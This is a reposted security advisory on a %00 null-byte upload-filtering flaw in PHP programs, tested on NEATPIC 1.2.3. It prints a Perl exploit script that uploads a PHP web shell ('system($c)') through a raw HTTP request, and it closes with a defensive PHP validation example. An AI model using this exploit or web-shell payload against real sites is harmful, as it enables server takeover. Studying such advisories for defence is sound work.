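PHP website alert: filtering flaw in multiple PHP programs (repost)
Impact: direct upload of arbitrary files
Vulnerability description:
When a PHP program takes a specified PATH, appending %00 after the PATH file name allows arbitrary files to be uploaded.
Tested program: NEATPIC PHP directory direct-read edition 1.2.3
http://web.cncode.com/SoftView.asp?SoftID=1820
Contributors to this document:
Vulnerability testers: Xiaolu, Lilo, SuperHei, Darkness [All BST Members]
Http://Www.Bugkidz.org
Xiaolu provided an exploit program for the vulnerability: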
#!/usr/bin/perl
$| = 1;    # unbuffered output
use Socket;
$host = "127.0.0.1";
$port = "80";
$UploadTo = "";
# multipart/form-data body: a "path" field ending in %00 and an "image" file part
$str =
"-----------------------------7d41f4a600472\r\n".
"Content-Disposition: form-data; name=\"path\"\r\n".
"\r\n".
"./php.php%00\r\n".
"-----------------------------7d41f4a600472\r\n".
"Content-Disposition: form-data; name=\"image\"; filename=\"F:\\tools\\1.gif\"\r\n".
"Content-Type: text/plain\r\n".
"\r\n".
# the opening of the uploaded file's content is missing on this page
"system($c);\r\n".
"?>\r\n".
"-----------------------------7d41f4a600472--\r\n".
"\r\n";
print $str;
$len=length($str);
print $len;
# request headers; the boundary matches the part delimiters above
$req ="POST /index.php?action=upload HTTP/1.1\r\n".
"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/msword, application/x-shockwave-flash, */*\r\n".
"Referer: http://127.0.0.1/index.php?path=.\r\n".
"Accept-Language: zh-cn\r\n".
"Content-Type: multipart/form-data; boundary=---------------------------7d41f4a600472\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Hotbar 4.4.6.0; .NET CLR 1.1.4322)\r\n".
"Host: 127.0.0.1\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n".
"Cookie: PHPSESSID=111111111111111111111111\r\n".
"\r\n".
"$str\r\n";
print $req;
@res = sendraw($req);
print @res;
#Hmm...Maybe you can send it by other way
# send the raw request over a TCP socket and return the response lines
sub sendraw {
    my ($req) = @_;
    my $target;
    $target = inet_aton($host) || die("inet_aton problems\n");
    socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
    if(connect(S,pack "SnA4x8",2,$port,$target)){
        select(S);
        $| = 1;
        print $req;
        my @res = <S>;
        select(STDOUT);
        close(S);
        return @res;
    }
    else {
        die("Can't connect...\n");
    }
}
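The request above is stopped by validating the `path` field and the client file name on the server before the file is moved. The following is an added example, not NEATPIC's code and not part of the original post; `UPLOAD_ROOT`, `ALLOWED_EXT` and `upload_target()` are hypothetical names, and only the `path` and `image` field names are taken from the request above.

```php
<?php
// Added example (assumed names, not the tested program's code).
const UPLOAD_ROOT = '/var/www/gallery/images';      // assumption: gallery root
const ALLOWED_EXT = ['gif', 'jpg', 'jpeg', 'png'];  // assumption: images only

function upload_target(string $pathField, string $clientName, string $tmpFile): string
{
    // 1. Refuse NUL bytes, raw or percent-encoded, in any client-supplied name.
    foreach ([$pathField, $clientName] as $value) {
        if (strpos($value, "\0") !== false || stripos($value, '%00') !== false) {
            throw new InvalidArgumentException('NUL byte in upload parameter');
        }
    }
    // 2. "path" may only name an existing directory inside UPLOAD_ROOT,
    //    so a value such as "./php.php" is refused even without the %00.
    $root = realpath(UPLOAD_ROOT);
    $dir  = realpath(UPLOAD_ROOT . '/' . $pathField);
    if ($root === false || $dir === false || !is_dir($dir)
        || ($dir !== $root && strpos($dir, $root . DIRECTORY_SEPARATOR) !== 0)) {
        throw new InvalidArgumentException('path is not a directory under the upload root');
    }
    // 3. Take only the extension from the client name and allowlist it.
    $base = basename(str_replace('\\', '/', $clientName));
    $ext  = strtolower(pathinfo($base, PATHINFO_EXTENSION));
    if (!in_array($ext, ALLOWED_EXT, true)) {
        throw new InvalidArgumentException('extension not allowed');
    }
    // 4. The content must parse as an image, whatever Content-Type was sent.
    if (!is_uploaded_file($tmpFile) || getimagesize($tmpFile) === false) {
        throw new InvalidArgumentException('upload is not an image');
    }
    // 5. The server, not the client, chooses the stored file name.
    return $dir . DIRECTORY_SEPARATOR . bin2hex(random_bytes(8)) . '.' . $ext;
}

if (isset($_POST['path'], $_FILES['image'])) {
    $file = $_FILES['image'];
    try {
        $target = upload_target($_POST['path'], $file['name'], $file['tmp_name']);
        move_uploaded_file($file['tmp_name'], $target);
    } catch (InvalidArgumentException $e) {
        http_response_code(400);
        error_log('rejected upload: ' . $e->getMessage());
    }
}
```

Logging the rejection reason gives the operations side a record of requests carrying `%00` in the `path` field.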
This article is from: http://www.linuxpk.com/30642.html
From "ITPUB Blog", link: http://blog.itpub.net/10763080/viewspace-970190/. To repost, please credit the source; otherwise legal liability will be pursued.